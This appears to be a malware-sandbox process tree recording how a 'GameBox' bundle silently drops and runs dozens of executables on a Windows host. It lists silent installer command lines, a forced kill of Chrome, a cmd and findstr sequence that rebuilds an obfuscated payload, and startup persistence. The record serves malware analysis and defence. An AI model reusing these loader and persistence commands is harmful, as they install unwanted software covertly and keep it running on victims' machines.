                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282111 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                      6⤵
                                                        PID:7940
                                                    • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                      "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                      5⤵
                                                        PID:5336
                                                      • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                        "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:5276
                                                        • C:\Users\Admin\AppData\Local\Temp\is-JJD4I.tmp\VPN.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-JJD4I.tmp\VPN.tmp" /SL5="$102F2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:5552
                                                          • C:\Users\Admin\AppData\Local\Temp\is-9JUAJ.tmp\Setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\is-9JUAJ.tmp\Setup.exe" /silent /subid=720
                                                            7⤵
                                                              PID:7472
                                                              • C:\Users\Admin\AppData\Local\Temp\is-RQMC4.tmp\Setup.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-RQMC4.tmp\Setup.tmp" /SL5="$3057C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-9JUAJ.tmp\Setup.exe" /silent /subid=720
                                                                8⤵
                                                                  PID:7808
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                    9⤵
                                                                      PID:8796
                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                        tapinstall.exe remove tap0901
                                                                        10⤵
                                                                        • Checks SCSI registry key(s)
                                                                        PID:6792
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                      9⤵
                                                                        PID:8792
                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                          tapinstall.exe install OemVista.inf tap0901
                                                                          10⤵
                                                                          • Drops file in System32 directory
                                                                          • Drops file in Windows directory
                                                                          • Checks SCSI registry key(s)
                                                                          PID:7588
                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                        9⤵
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:5516
                                                                        • C:\Windows\System32\Conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          10⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          PID:5336
                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                        9⤵
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:7080
                                                              • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:5228
                                                                • C:\Users\Admin\AppData\Local\Temp\is-EAK35.tmp\WEATHER Manager.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-EAK35.tmp\WEATHER Manager.tmp" /SL5="$102D8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:5416
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-BTGR0.tmp\Setup.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-BTGR0.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                    7⤵
                                                                    • Loads dropped DLL
                                                                    • Enumerates connected drives
                                                                    • Modifies system certificate store
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:4128
                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-BTGR0.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-BTGR0.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282111 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                      8⤵
                                                                        PID:5544
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:5464
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-EUN3J.tmp\MediaBurner2.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-EUN3J.tmp\MediaBurner2.tmp" /SL5="$30300,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                    6⤵
                                                                      PID:5848
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-3BOH8.tmp\3377047_logo_media.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-3BOH8.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                        7⤵
                                                                        • Drops file in Drivers directory
                                                                        • Executes dropped EXE
                                                                        • Adds Run key to start application
                                                                        • Drops file in Program Files directory
                                                                        PID:6040
                                                                        • C:\Program Files\7-Zip\DAYISKPCDJ\ultramediaburner.exe
                                                                          "C:\Program Files\7-Zip\DAYISKPCDJ\ultramediaburner.exe" /VERYSILENT
                                                                          8⤵
                                                                            PID:8020
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-GUPBJ.tmp\ultramediaburner.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-GUPBJ.tmp\ultramediaburner.tmp" /SL5="$30504,281924,62464,C:\Program Files\7-Zip\DAYISKPCDJ\ultramediaburner.exe" /VERYSILENT
                                                                              9⤵
                                                                              • Drops file in Program Files directory
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:6160
                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                10⤵
                                                                                  PID:7772
                                                                            • C:\Users\Admin\AppData\Local\Temp\40-9ad39-2c5-7e8bb-2e3cfb96567bd\Letaesamowa.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\40-9ad39-2c5-7e8bb-2e3cfb96567bd\Letaesamowa.exe"
                                                                              8⤵
                                                                              • Checks computer location settings
                                                                              PID:8180
                                                                            • C:\Users\Admin\AppData\Local\Temp\e5-76a24-9c2-75f85-bc77c404e8ff2\Vaezhasyholae.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\e5-76a24-9c2-75f85-bc77c404e8ff2\Vaezhasyholae.exe"
                                                                              8⤵
                                                                                PID:7352
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1d0uader.gpc\GcleanerEU.exe /eufive & exit
                                                                                  9⤵
                                                                                    PID:6224
                                                                                    • C:\Users\Admin\AppData\Local\Temp\1d0uader.gpc\GcleanerEU.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\1d0uader.gpc\GcleanerEU.exe /eufive
                                                                                      10⤵
                                                                                        PID:7596
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rb5inp3t.2rx\installer.exe /qn CAMPAIGN="654" & exit
                                                                                      9⤵
                                                                                      • Blocklisted process makes network request
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:5848
                                                                                      • C:\Users\Admin\AppData\Local\Temp\rb5inp3t.2rx\installer.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\rb5inp3t.2rx\installer.exe /qn CAMPAIGN="654"
                                                                                        10⤵
                                                                                          PID:8388
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qb3swn5i.yck\ufgaa.exe & exit
                                                                                        9⤵
                                                                                          PID:8232
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tjwnf10c.o2l\anyname.exe & exit
                                                                                          9⤵
                                                                                            PID:8580
                                                                                            • C:\Users\Admin\AppData\Local\Temp\tjwnf10c.o2l\anyname.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\tjwnf10c.o2l\anyname.exe
                                                                                              10⤵
                                                                                                PID:9092
                                                                                                • C:\Users\Admin\AppData\Local\Temp\tjwnf10c.o2l\anyname.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\tjwnf10c.o2l\anyname.exe" -q
                                                                                                  11⤵
                                                                                                    PID:7504
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0bgwty1o.j2f\gcleaner.exe /mixfive & exit
                                                                                                9⤵
                                                                                                  PID:8772
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\0bgwty1o.j2f\gcleaner.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\0bgwty1o.j2f\gcleaner.exe /mixfive
                                                                                                    10⤵
                                                                                                      PID:8864
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vrt5kaoo.gd5\autosubplayer.exe /S & exit
                                                                                                    9⤵
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:5900
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5404
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                              6⤵
                                                                                                PID:6928
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /f /im chrome.exe
                                                                                                  7⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:6372
                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5584
                                                                                              • C:\Users\Admin\AppData\Roaming\2224765.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\2224765.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:6024
                                                                                              • C:\Users\Admin\AppData\Roaming\2059197.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\2059197.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                PID:6140
                                                                                              • C:\Users\Admin\AppData\Roaming\6185768.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\6185768.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1336
                                                                                              • C:\Users\Admin\AppData\Roaming\7441899.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\7441899.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2196
                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5648
                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1448
                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks computer location settings
                                                                                              PID:5764
                                                                                              • C:\Users\Admin\Documents\oH4LHCvDBq6z1ikabO91exg8.exe
                                                                                                "C:\Users\Admin\Documents\oH4LHCvDBq6z1ikabO91exg8.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:7136
                                                                                              • C:\Users\Admin\Documents\IUqnTnqUo2b7MWS5xYPromSn.exe
                                                                                                "C:\Users\Admin\Documents\IUqnTnqUo2b7MWS5xYPromSn.exe"
                                                                                                6⤵
                                                                                                  PID:7164
                                                                                                • C:\Users\Admin\Documents\U3Qb_CclMf6nd4b3ehBc8nPm.exe
                                                                                                  "C:\Users\Admin\Documents\U3Qb_CclMf6nd4b3ehBc8nPm.exe"
                                                                                                  6⤵
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:6236
                                                                                                • C:\Users\Admin\Documents\eLXiHCDzidE9tIZ3VN7O1kv1.exe
                                                                                                  "C:\Users\Admin\Documents\eLXiHCDzidE9tIZ3VN7O1kv1.exe"
                                                                                                  6⤵
                                                                                                    PID:6380
                                                                                                    • C:\Users\Admin\Documents\eLXiHCDzidE9tIZ3VN7O1kv1.exe
                                                                                                      "C:\Users\Admin\Documents\eLXiHCDzidE9tIZ3VN7O1kv1.exe"
                                                                                                      7⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:4252
                                                                                                  • C:\Users\Admin\Documents\_nd4XiCiOMSrQxDoawZhSUWE.exe
                                                                                                    "C:\Users\Admin\Documents\_nd4XiCiOMSrQxDoawZhSUWE.exe"
                                                                                                    6⤵
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:6120
                                                                                                  • C:\Users\Admin\Documents\h9STGtukSAKDKKFOLuGPOhOH.exe
                                                                                                    "C:\Users\Admin\Documents\h9STGtukSAKDKKFOLuGPOhOH.exe"
                                                                                                    6⤵
                                                                                                      PID:6412
                                                                                                    • C:\Users\Admin\Documents\zeloFUfbMUs7Mm51Kl4yCD7o.exe
                                                                                                      "C:\Users\Admin\Documents\zeloFUfbMUs7Mm51Kl4yCD7o.exe"
                                                                                                      6⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:3232
                                                                                                      • C:\Users\Admin\Documents\zeloFUfbMUs7Mm51Kl4yCD7o.exe
                                                                                                        C:\Users\Admin\Documents\zeloFUfbMUs7Mm51Kl4yCD7o.exe
                                                                                                        7⤵
                                                                                                          PID:7484
                                                                                                      • C:\Users\Admin\Documents\knwfM6VCfS6VVfTv07zQYjx_.exe
                                                                                                        "C:\Users\Admin\Documents\knwfM6VCfS6VVfTv07zQYjx_.exe"
                                                                                                        6⤵
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:6060
                                                                                                      • C:\Users\Admin\Documents\HU7eYDWWP5QUxTbzd0DokA7_.exe
                                                                                                        "C:\Users\Admin\Documents\HU7eYDWWP5QUxTbzd0DokA7_.exe"
                                                                                                        6⤵
                                                                                                          PID:6700
                                                                                                        • C:\Users\Admin\Documents\aZ6tGlc2CoXF71gSxWxxjqQM.exe
                                                                                                          "C:\Users\Admin\Documents\aZ6tGlc2CoXF71gSxWxxjqQM.exe"
                                                                                                          6⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:6604
                                                                                                          • C:\Users\Admin\Documents\aZ6tGlc2CoXF71gSxWxxjqQM.exe
                                                                                                            C:\Users\Admin\Documents\aZ6tGlc2CoXF71gSxWxxjqQM.exe
                                                                                                            7⤵
                                                                                                              PID:7340
                                                                                                          • C:\Users\Admin\Documents\ECFffAuimbcVNn7fRZ9JOeoA.exe
                                                                                                            "C:\Users\Admin\Documents\ECFffAuimbcVNn7fRZ9JOeoA.exe"
                                                                                                            6⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:4388
                                                                                                          • C:\Users\Admin\Documents\JwV9eAeTMNf2cVD65DlSYDAk.exe
                                                                                                            "C:\Users\Admin\Documents\JwV9eAeTMNf2cVD65DlSYDAk.exe"
                                                                                                            6⤵
                                                                                                              PID:3160
                                                                                                            • C:\Users\Admin\Documents\IFUs9IiUHIorOC0LlbEAyZ7n.exe
                                                                                                              "C:\Users\Admin\Documents\IFUs9IiUHIorOC0LlbEAyZ7n.exe"
                                                                                                              6⤵
                                                                                                                PID:6948
                                                                                                              • C:\Users\Admin\Documents\l1yvqlLtlAK2pyDrVuLglD5G.exe
                                                                                                                "C:\Users\Admin\Documents\l1yvqlLtlAK2pyDrVuLglD5G.exe"
                                                                                                                6⤵
                                                                                                                  PID:7044
                                                                                                                • C:\Users\Admin\Documents\CsJpG5bwPNhe_Zm9NWEjKc_m.exe
                                                                                                                  "C:\Users\Admin\Documents\CsJpG5bwPNhe_Zm9NWEjKc_m.exe"
                                                                                                                  6⤵
                                                                                                                    PID:4688
                                                                                                                    • C:\Users\Admin\Documents\CsJpG5bwPNhe_Zm9NWEjKc_m.exe
                                                                                                                      "C:\Users\Admin\Documents\CsJpG5bwPNhe_Zm9NWEjKc_m.exe" -q
                                                                                                                      7⤵
                                                                                                                        PID:4820
                                                                                                                    • C:\Users\Admin\Documents\DOJrdn3F5DLm_Y40KOEdBJ9S.exe
                                                                                                                      "C:\Users\Admin\Documents\DOJrdn3F5DLm_Y40KOEdBJ9S.exe"
                                                                                                                      6⤵
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:5524
                                                                                                                      • C:\Users\Admin\Documents\DOJrdn3F5DLm_Y40KOEdBJ9S.exe
                                                                                                                        C:\Users\Admin\Documents\DOJrdn3F5DLm_Y40KOEdBJ9S.exe
                                                                                                                        7⤵
                                                                                                                          PID:7816
                                                                                                                      • C:\Users\Admin\Documents\4_VV8mg7oSeakXIPbbhCGnGD.exe
                                                                                                                        "C:\Users\Admin\Documents\4_VV8mg7oSeakXIPbbhCGnGD.exe"
                                                                                                                        6⤵
                                                                                                                          PID:6708
                                                                                                                          • C:\Users\Admin\AppData\Roaming\4210662.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\4210662.exe"
                                                                                                                            7⤵
                                                                                                                              PID:5216
                                                                                                                            • C:\Users\Admin\AppData\Roaming\5048709.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\5048709.exe"
                                                                                                                              7⤵
                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                              PID:6440
                                                                                                                          • C:\Users\Admin\Documents\8geZbon87oHlo_DeGnS7FBiz.exe
                                                                                                                            "C:\Users\Admin\Documents\8geZbon87oHlo_DeGnS7FBiz.exe"
                                                                                                                            6⤵
                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                            PID:6580
                                                                                                                          • C:\Users\Admin\Documents\57_l5d7TjN46a_DXtaCxyWpw.exe
                                                                                                                            "C:\Users\Admin\Documents\57_l5d7TjN46a_DXtaCxyWpw.exe"
                                                                                                                            6⤵
                                                                                                                              PID:7392
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-M0ORL.tmp\57_l5d7TjN46a_DXtaCxyWpw.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-M0ORL.tmp\57_l5d7TjN46a_DXtaCxyWpw.tmp" /SL5="$1057E,138429,56832,C:\Users\Admin\Documents\57_l5d7TjN46a_DXtaCxyWpw.exe"
                                                                                                                                7⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                PID:7552
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-O0IKN.tmp\Setup.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-O0IKN.tmp\Setup.exe" /Verysilent
                                                                                                                                  8⤵
                                                                                                                                    PID:1792
                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                      9⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Enumerates connected drives
                                                                                                                                      • Modifies system certificate store
                                                                                                                                      PID:8260
                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282111 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                        10⤵
                                                                                                                                          PID:6156
                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5700
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmp87AA_tmp.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\tmp87AA_tmp.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:5976
                                                                                                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                    "C:\Windows\System32\dllhost.exe"
                                                                                                                                    7⤵
                                                                                                                                      PID:7572
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                      7⤵
                                                                                                                                        PID:8032
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd
                                                                                                                                          8⤵
                                                                                                                                            PID:6488
                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                              findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                              9⤵
                                                                                                                                                PID:6824
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                Esplorarne.exe.com i
                                                                                                                                                9⤵
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:6080
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                  10⤵
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:6932
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                    11⤵
                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                    PID:5840
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                      12⤵
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      PID:8196
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                        13⤵
                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                        PID:8660
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                          14⤵
                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                          PID:8972
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                            15⤵
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:5732
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                              16⤵
                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                              PID:5196
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                17⤵
                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                PID:9056
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                  18⤵
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:9024
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                    19⤵
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:8872
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                      20⤵
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:5520
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        21⤵
                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                        PID:8552
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Drops startup file
                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                          PID:9020
                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                ping GFBFPSXA -n 30
                                                                                                                                                9⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:8016
                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:424
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                  2⤵
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  • Modifies data under HKEY_USERS
